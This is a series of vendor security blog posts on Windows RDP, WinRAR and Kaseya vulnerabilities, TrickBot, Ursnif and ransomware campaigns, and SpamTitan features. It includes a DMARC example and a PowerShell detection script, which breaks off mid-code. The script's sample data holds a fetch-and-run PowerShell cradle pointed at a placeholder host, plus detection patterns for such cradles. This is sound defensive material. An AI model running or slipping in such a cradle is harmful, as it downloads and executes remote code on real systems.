Microsoft has incorporated security protections into the latest Windows versions, so Windows 8 and Windows 10 users are unaffected. However, earlier versions of Windows contain the vulnerability.
Patches have been released for all vulnerable Windows versions, including Windows XP and Windows Server 2003, both of which have reached end of life and would normally receive no updates, just as Microsoft did for the Server Message Block (SMB) vulnerability exploited by WannaCry.
Affected Windows versions are:
Windows 7
Windows Server 2008 R2
Windows Server 2008
Windows XP
Windows Server 2003
Businesses running machines with the above operating systems should test the patch and apply it as soon as possible. In the meantime, a workaround should be implemented to prevent the flaw from being exploited.
The workaround is to block TCP port 3389 at the perimeter firewall and to enable Network Level Authentication (NLA) on all systems running vulnerable Windows versions. With NLA enabled, an attacker would first need to authenticate to Remote Desktop Services with a valid account before the flaw could be triggered, which removes the unauthenticated, wormable path but leaves the system exploitable by anyone holding valid credentials. The workaround therefore reduces risk but is not a replacement for the patch, which should still be applied as soon as possible. Businesses should also disable Remote Desktop Services where they are not essential, and RDP should never be exposed directly to the internet.
Microsoft has warned that the failure to mitigate the vulnerability, either by applying the patch or using the workaround, could result in another global attack on the scale of WannaCry. Such an attack is extremely likely. When patches are released to address critical flaws, it doesn’t take long for them to be reverse engineered and for exploits to be crafted. Such a high severity flaw is likely to be exploited quickly. It may only take a few days before the first attacks are conducted.
TitanHQ, the leading provider of spam filtering, web filtering, and email archiving solutions to SMBs and managed service providers (MSPs) has announced a new partner program has been launched: TitanShield.
The aim of the TitanShield Partner Program is to provide MSPs, cloud distributors, OEM partners, Wi-Fi providers, and Technology Alliance partners with all the tools and support they need to start offering TitanHQ solutions to their clients and to provide continued support.
The launch of the new program coincides with TitanHQ’s 20-year anniversary. For the past two decades, TitanHQ has been developing innovative cybersecurity solutions for SMBs and MSPs that serve the SMB market. The company started by developing anti-spam technologies for businesses in Ireland and has since grown into an award-winning global provider of cybersecurity solutions.
Over the course of the past year, TitanHQ has been working closely with partners to make it as easy as possible for them to sell, onboard, deliver, and manage advanced network security solutions for their client base. In fact, in the past 9 months, as a result of those efforts, TitanHQ has increased its partner base by 40%.
In addition to providing cutting edge cybersecurity solutions to protect against email and web-based attacks and meet compliance requirements, TitanHQ offers partners flexible pricing models, competitive margins, and a wealth of sales and technical resources to drive revenue growth.
Under the new partner program, all qualified partners will be assigned a dedicated account manager, a support team, and engineers. Partners also benefit from a full range of APIs that will enable them to incorporate TitanHQ products into their backend provisioning and management systems and will be provided with extensive sales enablement and marketing support, including lead generation resources.
“Our new TitanShield partner program allows us to separate partners into their specific areas so that we can make sure they are receiving best practices, simple pricing models and focused information for the markets and customers they serve,” explained TitanHQ Executive VP of Strategic Alliances, Rocco Donnino “Our program takes a unique and strategic approach for our partners and can be customized to fit all business models.”
MSPs and cloud providers who have not yet started offering TitanHQ solutions to their clients can find out more about the TitanShield program by contacting the TitanHQ partner team.
Monday April 15 is Tax Day in the United States – the deadline for submitting 2018 tax returns. Each year in the run up to Tax Day, cybercriminals step up their efforts to obtain users’ tax credentials. In the past few weeks, many tax-related phishing scams have been detected which attempt to install information stealing malware.
One of the main aims of these campaigns is to obtain tax credentials. These are subsequently used to file fraudulent tax returns with the IRS. Tax is refunded to accounts controlled by the attackers, checks are redirected, and a range of other methods are used to obtain the payments.
Attacks on tax professionals are commonplace. If access can be gained to a tax professional’s computer, the tax credentials of clients can be stolen, and fraudulent tax returns can be filed in their names. A single successful attack on a tax professional can see the attacker obtain many thousands of dollars in tax rebates.
There has been the usual high level of tax-related phishing scams during the 2019 tax season and businesses of all types have been targeted. It is not only tax credentials that cybercriminals are after. Many tax-themed phishing scams have been conducted which attempt to install malware such as the TrickBot banking Trojan.
The TrickBot banking Trojan is a powerful malware variant which, once installed, can give an attacker full control of an infected computer. The malware is primarily an information stealer. A successful installation on one business computer can allow the attackers to move laterally and spread the malware across the whole network.
The primary purpose of the TrickBot Trojan is to steal banking credentials which can be used to make fraudulent wire transfers; however, TrickBot is regularly updated with new features. In addition to stealing banking credentials, the malware can steal VNC, RDP, and PuTTY credentials.
The threat actors behind TrickBot are highly organized and well resourced. More than 2,400 command and control servers are used by the cybercriminal gang and that number continues to grow.
Three new TrickBot malware campaigns have been detected since late January by IBM X-Force researchers. The spam email messages are carefully crafted to appear legitimate and innocuous to business users, and appear to have been sent by well-known accounting and payroll firms such as ADP and Paychex.
Spoofed email addresses are commonly used, although in these campaigns, the attackers have used domain squatting. They have registered domains that are very similar to those used by the accounting firms. The domains have transposed letters and slight misspellings to make the email appear to have been sent from a legitimate source. The domains can be highly convincing and, in some cases, are extremely difficult to identify as fake.
The emails are well written and claim to include tax billing records, which are included as attached spreadsheets. The spreadsheets contain malicious macros which, if allowed to run, will download the TrickBot Trojan.
To prevent attacks, several steps should be taken. Macros should be disabled by default on all devices. Prompt patching is required to keep all software and operating systems up to date to prevent vulnerabilities from being exploited.
End users should receive security awareness training and should be taught cybersecurity best practices and how to identify phishing emails. An advanced spam and anti-phishing solution should also be implemented to ensure phishing emails are identified and prevented from reaching end users’ inboxes. Further, all IoCs and IPs known to be associated with the threat actors should be blocked through spam filtering solutions, firewalls, and web gateways.
The latter is made easy with SpamTitan and WebTitan – TitanHQ’s anti-phishing and web filtering solutions for SMBs.
Current users of the SpamTitan email security solution, and SMBs and MSPs that are considering implementing SpamTitan or offering it to their clients, are invited to join a webinar in which TitanHQ will explain the new features that have recently been incorporated into the anti-phishing and anti-spam solution.
SpamTitan has recently received a major update that has seen the incorporation of DMARC email authentication to better protect users from email impersonation attacks and the addition of a new Bitdefender-powered sandbox. The sandbox allows users to safely assess email attachments for malicious actions, to better protect them against zero-day malware and other malicious software delivered via email.
The webinar will explain these and other features of SpamTitan in detail and the benefits they offer to customers, including how they better protect SMBs and SMEs from phishing, spear phishing, spoofing, ransomware, malware, and zero-day attacks.
The webinar will also explain why SpamTitan is the leading email security solution for managed service providers serving the SMB and SME market and how the solution can help to enhance security for their clients and can easily be slotted into their service stacks.
The webinar will take place on Thursday April 4, 2019 at 12pm EST and will last approximately 30 minutes.
This week, TitanHQ has rolled out two new features for its award-winning email security solution SpamTitan: Sandboxing and DMARC email authentication.
TitanHQ developed the technology behind its email security solution more than 20 years ago and over the past two decades SpamTitan has received many updates to improve features for end users and increase detection rates.
SpamTitan already blocks more than 99.9% of spam and malicious emails to prevent threats from reaching end users’ inboxes. The level of protection SpamTitan provides against email attacks has made it the gold standard in email security for the SMB market and managed service providers serving SMBs.
In order to provide even greater protection against increasingly sophisticated email threats, TitanHQ added a new sandboxing feature. The next-generation sandboxing feature, powered by Bitdefender, provides SpamTitan customers with a safe environment to run in-depth analyses of suspicious programs and files that have been delivered via email.
New SpamTitan Sandboxing Service
The sandbox is a powerful virtual environment totally separate from other systems. When programs are run in the sandbox, they behave as they would on an ordinary endpoint and can be assessed for suspicious behavior and malicious actions without causing harm.
Prior to being sent to the sandbox, files are first analyzed using SpamTitan’s anti-malware technologies. Only files that require further analysis make it to the sandbox, where they are safely detonated. Tactics used by malware to evade detection and avoid analysis are logged and flagged. Purpose-built, advanced machine learning algorithms assess the files and check their actions against an extensive array of known threats from a range of online repositories in a matter of minutes.
If the file is confirmed as benign, it can be released. If the file is determined to be malicious, the sandboxing service automatically sends a report to Bitdefender’s Global Protective Network and all further instances of the threat will then be blocked globally, so the file does not need to be analysed again.
The sandbox provides advanced protection against zero-day exploits, polymorphic threats, APTs, malicious URLs, new malware samples that have yet to be identified as malicious, and new threats that have been developed for undetectable targeted attacks.
Incorporation of this feature into SpamTitan gives customers advanced emulation-based malware analysis capabilities without having to purchase a separate sandboxing solution and ensures customers are protected against rapidly evolving advanced threats.
DMARC Email Authentication Added to SpamTitan
Email spoofing is the term given to the use of a forged sender address. Email spoofing is used to increase the likelihood of an email being delivered and opened by an end user. The email address of a known contact, well known company, or government organization is usually spoofed to abuse trust in that individual, brand, or organization.
DMARC authentication is now essential for all businesses and is a powerful control to prevent spoofing attacks. DMARC builds on the SPF and DKIM checks of email headers to provide further information about the true sender of an email. Through DMARC, the message is authenticated as having been sent from the organization that owns the domain shown in the From header. If authentication fails, the message is rejected.
While SPF provides a certain degree of protection against email spoofing, DMARC is far more dependable. SpamTitan now incorporates DMARC authentication to provide even greater protection against email spoofing attacks.
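To make the DMARC decision described above concrete, here is an added illustration (not SpamTitan’s code) of how a receiver evaluates a message: it takes the SPF and DKIM results, checks that the authenticated domains align with the From-header domain, and applies the domain owner’s published policy. The DMARC records, domains, and the two-label organizational-domain rule are constructed simplifications (a real receiver uses the Public Suffix List).

```python
"""Minimal DMARC policy evaluation (added illustration, not SpamTitan code).

Given the results of SPF and DKIM checks on an inbound message, decide the
DMARC disposition by checking identifier alignment against the domain in the
RFC5322.From header and applying the domain owner's published policy.
The organizational-domain lookup is simplified to the last two labels; a real
receiver uses the Public Suffix List. The pct= tag is parsed but not applied.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed DMARC TXT records as they would be fetched from _dmarc.<domain>.
# These domains are examples, not real deployments.
DMARC_RECORDS = {
    "example.com": "v=DMARC1; p=reject; adkim=s; aspf=r; pct=100",
    "example.org": "v=DMARC1; p=quarantine; pct=100",
}


@dataclass
class AuthResults:
    from_domain: str                       # domain of the RFC5322.From header
    spf_result: str                        # "pass" / "fail" / "none"
    spf_domain: Optional[str] = None       # envelope (MAIL FROM) domain SPF checked
    dkim_pass_domains: List[str] = field(default_factory=list)  # d= of each valid signature


def parse_dmarc(record: str) -> Dict[str, str]:
    """Parse 'tag=value; tag=value' into a dict, filling in RFC 7489 defaults."""
    tags = {"adkim": "r", "aspf": "r", "pct": "100"}
    for part in record.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    if tags.get("v") != "DMARC1" or "p" not in tags:
        raise ValueError("not a valid DMARC record")
    return tags


def org_domain(domain: str) -> str:
    """Simplified organizational domain: the last two labels."""
    labels = domain.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def aligned(auth_domain: Optional[str], from_domain: str, mode: str) -> bool:
    """Strict ('s') alignment needs an exact match; relaxed ('r') needs the same org domain."""
    if not auth_domain:
        return False
    a, f = auth_domain.lower(), from_domain.lower()
    if mode == "s":
        return a == f
    return org_domain(a) == org_domain(f)


def dmarc_disposition(res: AuthResults, records: Dict[str, str] = DMARC_RECORDS) -> str:
    """Return 'none' (DMARC pass), 'quarantine', 'reject', or 'no-policy'."""
    from_domain = res.from_domain.lower()
    record = records.get(from_domain) or records.get(org_domain(from_domain))
    if record is None:
        return "no-policy"
    tags = parse_dmarc(record)

    spf_ok = res.spf_result == "pass" and aligned(res.spf_domain, from_domain, tags["aspf"])
    dkim_ok = any(aligned(d, from_domain, tags["adkim"]) for d in res.dkim_pass_domains)
    if spf_ok or dkim_ok:
        return "none"

    # A subdomain falls under sp= when the owner published one, otherwise p=.
    if from_domain != org_domain(from_domain) and "sp" in tags:
        return tags["sp"]
    return tags["p"]


if __name__ == "__main__":
    # Spoofed From header: SPF passes for the attacker's own envelope domain,
    # but that domain does not align with example.com, so DMARC fails.
    spoof = AuthResults("example.com", "pass", "attacker-example.net")
    print(dmarc_disposition(spoof))   # reject
    legit = AuthResults("example.com", "pass", "bounce.example.com")
    print(dmarc_disposition(legit))   # none
```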
Both of these new features have been added in the latest update to SpamTitan and are available to users at no extra cost.
“We have listened to requests from customers to have new features added to SpamTitan, and by far the most requested improvements are anti-spoofing technology and sandboxing,” said Ronan Kavanagh, CEO, TitanHQ. “I’m delighted to say that both of these new features have now been added to provide enhanced security for customers at no extra cost.”
It doesn’t take long after the release of a patch for hackers to take advantage, especially when the vulnerability potentially impacts 500 million users. It is therefore not surprising that at least one hacker is taking advantage of a recently disclosed WinRAR vulnerability.
Oftentimes, vulnerabilities are found in certain versions of software, but this vulnerability affects all WinRAR users and dates back 19 years. The WinRAR vulnerability was identified by researchers at Check Point. WinRAR was alerted and confirmed the vulnerability existed, and promptly issued an updated version of the file compression tool with the vulnerability removed. Details of the vulnerability were disclosed in a Check Point blog post on February 20, 2019.
The WinRAR vulnerability in question was present in a third-party DLL file which was included in WinRAR to allow ACE archive files to be uncompressed. The researchers found that by renaming a .rar archive to make it appear that the compressed file was an ACE archive, it was possible to extract a malicious file into the startup folder unbeknown to the user. That file would then run on boot, potentially giving an attacker full control of the device. The malicious file would continue to load on startup until discovered and removed.
All an attacker would need to do to exploit the WinRAR vulnerability is to convince a user to open a specially crafted .rar archive file attached to an email. Compressed files are often used in malspam campaigns to hide malicious executable files. Since .rar and .zip files are commonly used by businesses to send large files via email, they are likely to be recognized and may be opened by end users.
In this case, if the archive contents are extracted, the user would likely be unaware that anything untoward had happened, as the executable is loaded into the startup folder without giving any indication the file has been extracted. Due to the location of extraction, no further actions are required by the user.
In this case, the executable installs a backdoor, although only if the user has User Account Control (UAC) disabled. That said, this is unlikely to be the only campaign exploiting the WinRAR vulnerability. Other threat actors may develop a way to exploit the vulnerability for all users that have yet to update to the latest WinRAR version.
Many users will have WinRAR installed on their computer but will rarely use the program, so may not be aware that there is an update available. It is possible that a large percentage of users with the program installed have yet to update to the latest version and are vulnerable to attack.
This campaign illustrates just how important it is to patch promptly. As soon as a patch is released for a popular software program, it is only a matter of time before the vulnerability is exploited, sometimes just a few days.
Patching all devices in use in an organization can take time. It is therefore important to make sure that all employees receive security awareness training and are taught email security best practices and how to identify potentially malicious emails.
Unfortunately, social engineering techniques can be highly convincing, and many users may be fooled into opening email attachments, especially when the attacker spoofs the sender’s email address and the email appears to come from a known individual. It is therefore essential to have an advanced spam filtering solution in place that is capable of detecting malicious attachments at source, including malicious files hidden inside compressed files, and stop the messages from being delivered to inboxes.
A year-old vulnerability in the Connectwise plugin for Kaseya VSA has been exploited in a series of MSP ransomware attacks over the past two weeks. The latest campaign is one of several cyberattacks targeting MSPs in recent months that abuse trusted relationships between MSPs and their clients. The aim of the attacks is to gain access to MSP systems in order to attack their clients.
MSPs are trusted by SMBs to improve security, identify and correct vulnerabilities, and prevent costly cyberattacks. However, if MSPs do not follow cybersecurity best practices such as ensuring patches and software updates are applied on their own systems, they place their clients at risk.
MSP ransomware attacks such as these have potential to cause considerable damage to an MSP’s reputation, could easily result in loss of clients, and also possible legal action.
One MSP Reddit poster explained that cybercriminals recently exploited a vulnerability to gain access to clients’ systems and had installed ransomware on approximately 80% of client machines. Other attacks have also succeeded in encrypting files on client networks.
It is not always possible to update plugins, apply patches, and perform software updates instantly, but in this case the vulnerability was identified in November 2017. A proof of concept exploit was published, and an updated plugin was rapidly released by Connectwise to correct the flaw. Despite this, 126 MSPs are still using the out of date and vulnerable plugin according to a recent Kaseya security warning.
The Connectwise plugin for Kaseya VSA contained a flaw – CVE-2017-18362 – that allowed commands to be run on a Kaseya VSA server without the need for authentication due to an error within the Connectwise API. By exploiting the vulnerability, an attacker would be able to gain access to the Kaseya VSA server and conduct attacks on MSP clients. In this case, GandCrab ransomware was installed.
The group behind this campaign may not be the only criminal gang to attempt to exploit the vulnerability. It is possible that some MSPs who failed to update the plugin may have also had their server compromised and less conspicuous malware may have been installed.
All MSPs that use Connectwise and have the plugin installed on their on-premise server should ensure the latest version of the plugin is installed. Connectwise has made a tool available to users that will conduct a scan to determine if the vulnerable plugin is in use. It is also recommended to disconnect the VSA server from the internet and to perform an audit to determine if the server has been compromised.
Thanks to advanced cybersecurity defenses, many of which are provided by MSPs to their clients, it is becoming harder for cybercriminals to use standard tactics such as mass spam emails to gain access to business networks. As the past few months have shown, cybercriminals are now targeting MSPs to gain access to their clients’ systems. It is therefore essential that MSPs scan for vulnerabilities on their own systems to identify potential weaknesses before they are exploited by hackers.
The 2019 Cybersecurity Survey conducted by the Healthcare Information and Management Systems Society (HIMSS) has highlighted healthcare email security weaknesses and the seriousness of the threat of phishing attacks.
HIMSS conducts the survey each year to identify attack trends, security weaknesses, and areas where healthcare organizations need to improve their cybersecurity defenses. This year’s survey confirmed that phishing remains the number one threat faced by healthcare organizations and the extent that email is involved in healthcare data breaches.
This year’s study was conducted on 166 healthcare IT leaders between November and December 2018. Respondents were asked questions about data breaches and security incidents they had experienced in the past 12 months, the causes of those breaches, and other cybersecurity matters.
Phishing attacks are pervasive in healthcare and a universal problem for healthcare providers and health plans of all sizes. 69% of significant security incidents at hospitals in the past 12 months used email as the initial point of compromise. Overall, across all healthcare organizations, email was involved in 59% of significant security incidents.
The email incidents include phishing attacks, spear phishing, whaling, business email compromise, and other email impersonation attacks. Those attacks resulted in network breaches, data theft, email account compromises, malware infections, and fraudulent wire transfers.
When asked about the categories of threat actors behind the attacks, 28% named ‘online scam artists’ and 20% negligence by insiders. Online scam artists include phishers who send hyperlinks to malicious websites via email. It was a similar story the previous year when the survey was last conducted.
Given the number of email-related breaches it is clear that anti-phishing defenses in healthcare need to be improved. HIPAA requires all healthcare employees to receive security awareness training, part of which should include training on how to identify phishing attacks. While this is a requirement for compliance, a significant percentage (18%) of healthcare organizations do not take this further and are not conducting phishing simulations, even though they have been shown to improve resilience against phishing attacks by reinforcing training and identifying weaknesses in training programs.
The continued use of out of date and unsupported software was also a major concern. Software such as Windows Server and Windows XP are still extensively used in healthcare, despite the number of vulnerabilities they contain. 69% of respondents admitted still using legacy software on at least some machines. When end users visit websites containing exploit kits, vulnerabilities on those devices can easily be exploited to download malware.
It may take some time to phase out those legacy systems, but improving healthcare email security is a quick and easy win. HIMSS recommends improving training for all employees on the threat from phishing with the aim of decreasing click rates on phishing emails. That is best achieved through training, phishing simulations, and better monitoring of responses to phishing emails to identify repeat offenders.
At TitanHQ, we can offer two further solutions to improve healthcare email security. The first is an advanced spam filtering solution that blocks phishing emails and prevents them from being delivered to inboxes. The second is a solution that prevents employees from visiting phishing and other malicious websites such as online scams.
SpamTitan is an advanced anti-phishing solution that scans all incoming emails using a wide range of methods to identify malicious messages. The solution has a catch rate in excess of 99.9% with a false positive rate of just 0.03%. The solution also scans outbound messages for spam signatures to help identify compromised email accounts.
WebTitan Cloud is a cloud-based web filtering solution that blocks attempts by employees to visit malicious websites, either through web surfing or responses to phishing emails. Should an employee click on a link to a known malicious site, the action will be blocked before any harm is caused. WebTitan also scans websites for malicious content to identify and block previously known phishing websites and other online scams. Alongside robust security awareness training programs, these two solutions can help to significantly improve healthcare email security.
For further information on TitanHQ’s healthcare email security and anti-phishing solutions, contact TitanHQ today.
A new Office 365 phishing scam has been detected that attempts to get users to part with their Office 365 credentials with a request for collaboration via SharePoint. These collaboration requests spoofing SharePoint are becoming more common.
The SharePoint spoofing campaign was first detected in the summer of 2018 by researchers at cybersecurity firm Avanan. The Office 365 phishing scam is ongoing and has proven to be highly effective. According to Kaspersky Lab, the phishing campaign has been used in targeted attacks on at least 10% of companies that use Office 365.
This Office 365 phishing scam abuses trust in SharePoint services that are often used by employees. An email is sent to an Office 365 user that contains a link to a document stored in OneDrive for Business. In contrast to many phishing campaigns that spoof links and fool users into visiting a website other than the one indicated by the link text, this link actually does direct the user to an access request document on OneDrive.
A link in the document then directs users to a third-party website where they are presented with a Microsoft Office 365 login page that is a perfect copy of the official Office 365 login page. If login credentials are entered, they are given to the scammers. Once obtained, it is possible for the scammers to gain access to the Office 365 account of the user, including email and cloud storage.
The email accounts can be used for further phishing campaigns on the user’s contacts. Since those messages come from within the organization, they are more likely to be trusted. Email accounts can also contain a wealth of sensitive information which is of great value to competitors. In healthcare, email accounts can contain patient information, including data that can be used to steal identities. The attackers can also use the compromised credentials to spread malware. Employees may know not to open attachments from unknown individuals, but when they are sent from a colleague, they are more likely to be opened.
Businesses that use Microsoft’s Advanced Threat Protection (ATP) service may mistakenly believe they are protected from phishing attacks such as this. However, since the links in the email are genuine OneDrive links, they are not identified as malicious. It is only the link in those documents that is malicious, but once the document is opened, Microsoft’s ATP protection has already been bypassed.
Finding Office 365 users is not difficult. According to a 2017 Spiceworks survey, 83% of enterprises use Office 365 and figures from 2018 suggest 56% of organizations globally have adopted Office 365. However, a basic check can easily identify Office 365 users as it is broadcast on public DNS MX records. If one user can be found in an organization, it is highly likely that every other user will be using Office 365.
Businesses can take steps to avoid Office 365 phishing scams such as this.
Ensure that all employees are made aware of the threat from phishing, and specifically this Office 365 phishing scam. They should be told to exercise caution with offers to collaborate that have not been preceded by a conversation.
Conduct phishing email simulations to test defenses against phishing and identify individuals that require further security awareness training.
Activate multifactor authentication to prevent stolen credentials from being used to access Office 365 accounts from unknown locations/devices.
Change from ATP anti-phishing controls to a third-party spam filter such as SpamTitan. This will not only improve catch rates, it will also not broadcast that the organization uses Office 365.
Use an endpoint protection solution that is capable of detecting phishing attacks.
Implement a web filter to prevent users from visiting known phishing websites and other malicious web pages.
Office 365 Phishing Scam Uses SharePoint Lure FAQ
How does a spam filter block social engineering attacks?
Spam filters use real-time block lists to block known sources of spam, greylisting to identify new spam sources, and SPF and DMARC to identify email impersonation attacks. Message content is checked for common signatures of phishing and social engineering attacks. Each message is assigned a score. If a threshold is reached, the message is quarantined or blocked.
What are the main anti-phishing solutions?
A spam filter is the most important anti-phishing solution to prevent phishing and other malicious messages from reaching inboxes. A web filter is important for preventing end users from visiting malicious websites, and end user training and phishing simulations are needed to condition the workforce to recognize threats. Multi-factor authentication is also important to prevent compromised credentials from being used to access accounts.
Why do I need a third-party spam filter for Office 365?
The default Office 365 spam filter is effective at blocking spam email and known malware, but is far less effective at blocking phishing, spear phishing, and zero-day attacks. A more advanced spam filter is required to block these dangerous email threats. SpamTitan uses dual antivirus engines and sandboxing for malware protection, checks URLs against blacklists of known spam and phishing sources, uses greylisting to detect new spam sources, and applies SPF and DMARC to identify email impersonation attacks.
Can antivirus software stop phishing attacks?
Antivirus software is concerned with preventing viruses, malware, and ransomware from being downloaded or executed on a device. Phishing attacks are usually concerned with obtaining sensitive information such as login credentials, and antivirus software will not block these attacks. A spam filter protects against phishing by analyzing message headers, content, and embedded hyperlinks to identify phishing and spear phishing emails and prevent them from being delivered.
Is spam filtering software expensive?
Spam filtering software offers exceptional value for money as it blocks email threats that could easily result in a costly data breach or malware infection. The cost of spam filtering software is typically a few dollars per user per year. To find out how much an advanced spam filter is likely to cost, use our cost calculator or contact the sales team for a no obligation quote.
The French engineering firm Altran Technologies has been grappling with a malware infection that hit the firm on January 24, 2019.
Immediately following the malware attack, Altran shut down its network and applications to prevent the spread of the infection and to protect its clients. Technical and computer forensics experts are now assisting with the investigation. The Altran cyberattack has affected operations in some European countries and the firm is currently working through its recovery plan.
A public announcement has been made about the attack although the malware involved has not been officially confirmed. Some cybersecurity experts believe the attack involved a new ransomware variant named LockerGoga which emerged in the past few days.
LockerGoga ransomware was first identified on January 24 in Romania and subsequently in the Netherlands. It was named by MalwareHunterTeam, based on the path used for compiling the source code into an executable.
LockerGoga ransomware does not appear to be a particularly sophisticated malware variant. Security researcher Valthek, who analyzed the malware, claimed the code was ‘sloppy’, the encryption process was slow, and little effort appears to have been made to evade detection. The ransomware appends encrypted files with the .locked file extension.
The ransomware note suggests that companies are being targeted although it is currently unclear how the ransomware is being distributed.
LockerGoga ransomware encrypts a wide range of file types and, depending on the command line argument, may target all files. Since the encryption process is slow, fast detection and remediation will limit the damage caused. Failure to detect the ransomware and take prompt action to mitigate the attack could prove costly. The ransomware can spread laterally through network connections and network shares, resulting in widespread file encryption.
The ransomware had a valid certificate that was issued to a UK firm by Comodo Certificate Authority. The certificate has since been revoked.
LockerGoga ransomware is currently being detected as malicious by 46/69 AV engines on VirusTotal, including Bitdefender, the primary AV engine used by SpamTitan.
The Allscripts EHR breach in January 2018 resulted in massive disruption for the company and its clients. Clients were locked out of their electronic health records for several days while the company battled to recover from the attack. Around 1,500 of the company’s clients were affected.
The cost of mitigating the ransomware attack was considerable, and in addition to those costs, the Allscripts EHR breach prompted many clients to take legal action. The costs continue to mount.
The Allscripts EHR breach involved SamSam ransomware, which has plagued the healthcare industry over the past couple of years. The threat actors behind the attacks typically gain access to healthcare networks through RDP vulnerabilities and deploy the ransomware manually after scouting the network. This way, maximum damage can be inflicted, which increases the probability of the ransom being paid.
The Allscripts EHR breach certainly stands out as one of the most damaging ransomware attacks of 2018, although it was just one of many healthcare ransomware attacks in 2018 involving many ransomware variants.
According to Beazley Breach Response Services, ransomware attacks more than doubled in September. Many cybercriminals have switched to cryptocurrency mining malware, but the ransomware attacks on healthcare organizations are continuing and show no sign of slowing.
In recent months, there has been a growing trend of combining malware variants to maximize the profitability of attacks. Ransomware is a quick and easy way for cybercriminals to earn money but combining ransomware with other malware variants is much more profitable. Further, if files are recovered from backups and no ransom is paid, cybercriminals can still profit from the attacks.
Several campaigns have been detected recently that combine Trojans such as AZORult, Emotet and TrickBot with ransomware. Attacks with these Trojans have increased by 132% since 2017 according to Malwarebytes. The Trojans steal sensitive information through keylogging, are capable of lateral movement within a network, and also serve as downloaders for other malware such as Ryuk and GandCrab ransomware. Once information has been stolen, the ransomware payload is deployed.
The Allscripts EHR breach was somewhat atypical. It is far more common for ransomware to be delivered via email than brute force attacks on RDP. The campaigns combining Emotet, Trickbot, and AZORult with ransomware are primarily delivered by email.
In addition to ransomware attacks, phishing attacks are rife in healthcare. Email was the most common location of exposed protected health information in 2018. Email security is a weak point in healthcare defenses.
The number of successful ransomware and phishing attacks in healthcare makes it clear that email security needs to improve. An advanced spam filter is required to block malicious emails, end user training must be improved to teach employees how to recognize email threats, and intrusion detection systems need to be deployed along with powerful anti-virus solutions. Only by implementing layered defenses to block email attacks and other attack vectors will healthcare organizations be able to reduce the risk of ransomware attacks.
A new Ursnif Trojan campaign has been detected that uses a new variant of the malware which uses fileless techniques to avoid detection. In addition to the banking Trojan, GandCrab ransomware is also downloaded.
Increase in Banking Trojan and Ransomware Combination Attacks
Ransomware attacks can cause considerable disruption to businesses, although a good backup strategy can allow businesses to recover quickly in the event of a successful attack without having to pay the ransom demand.
However, there has been a significant increase in phishing attacks that deliver not one but two malware variants – ransomware to extort money from companies but also an information stealer to obtain sensitive information such as login and banking credentials. Malware variants used in these attacks also have the capability to download other malware variants and gather system data and process information for use in further attacks.
These phishing campaigns allow hackers to maximize the profitability of attacks and make the attack profitable even if the business does not pay the ransom.
There have been several examples of these attacks in recent months. Earlier in January, warnings were issued about the combination of Ryuk ransomware with the Trickbot and Emotet Trojans – two malware variants that are used in wire fraud attacks. Ryuk ransomware has been extensively used in attacks on U.S. healthcare providers. The combination with the banking Trojans makes the attacks far more damaging.
Now another campaign has been detected using different malware variants – the Ursnif Trojan and the latest version of GandCrab ransomware.
What Does the Ursnif Trojan Do?
The Ursnif Trojan is one of the most active banking Trojans currently in use. The main functions of the malware are to steal system information and bank account credentials from browsers. The latest variants of the Ursnif Trojan have also been used to deploy other malware variants such as GandCrab ransomware.
According to security researchers at Carbon Black, who identified the latest campaign, the Ursnif Trojan now uses fileless execution mechanisms to make detection more difficult. Instead of downloading and writing files to the hard drive – which can be detected – a PowerShell script downloads a payload and executes it in memory. That payload then downloads a further file and injects it into the PowerShell process, ultimately resulting in the downloading of the ransomware.
Code that runs only in memory often does not survive a reboot, but the latest variant of Ursnif has persistence. This is achieved by storing an encoded PowerShell command inside a registry key and subsequently launching the command via the Windows Management Instrumentation Command-line (WMIC).
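As an added illustration (not from the original article or Carbon Black's research) of how a defender can surface the persistence chain just described, the following Python triages constructed process-creation events: it decodes PowerShell -EncodedCommand payloads, which are base64 of UTF-16LE text, and flags the combination of a WMIC parent, an encoded command and in-memory download indicators. The event fields, paths and URL are constructed for this example.

```python
import base64
import binascii
import re

# Constructed sample payload: the "download and run in memory" step the article
# describes, pointing at a reserved .invalid placeholder host.
SAMPLE_PS = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p')"
# -EncodedCommand takes base64 of the UTF-16LE bytes of the script text.
SAMPLE_B64 = base64.b64encode(SAMPLE_PS.encode("utf-16-le")).decode("ascii")

# Constructed process-creation events: parent image, child image, command line.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\System32\wbem\WMIC.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -enc " + SAMPLE_B64},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\nightly-backup.ps1"},
]

# PowerShell accepts unambiguous prefixes of -EncodedCommand (-e, -ec, -enc, ...),
# so match the usual abbreviations followed by a base64 run.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-e(?:c|n|nc|ncoded|ncodedcommand)?\s+([A-Za-z0-9+/=]{8,})")
HIDDEN_WINDOW = re.compile(r"(?i)-w(?:indowstyle)?\s+hidden")
# Indicators that the decoded script fetches and runs code without writing it to disk.
DOWNLOAD_CRADLE = re.compile(
    r"(?i)downloadstring|downloadfile|downloaddata|invoke-expression|\biex\b|frombase64string")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload as text, or None if there is none."""
    match = ENC_FLAG.search(cmdline)
    if not match:
        return None
    try:
        raw = base64.b64decode(match.group(1), validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.decode("utf-16-le", errors="replace")


def triage_event(event):
    """Return the reasons this process event is suspicious (empty list if none)."""
    reasons = []
    if event["parent"].lower().endswith("wmic.exe"):
        reasons.append("powershell_spawned_by_wmic")
    decoded = decode_encoded_command(event["cmdline"])
    if decoded is not None:
        reasons.append("encoded_command")
        if DOWNLOAD_CRADLE.search(decoded):
            reasons.append("in_memory_download_cradle")
    if HIDDEN_WINDOW.search(event["cmdline"]):
        reasons.append("hidden_window")
    return reasons


def triage(events):
    """Return (cmdline, reasons) for every event that raised at least one reason."""
    hits = []
    for event in events:
        reasons = triage_event(event)
        if reasons:
            hits.append((event["cmdline"], reasons))
    return hits


if __name__ == "__main__":
    for cmdline, reasons in triage(SAMPLE_EVENTS):
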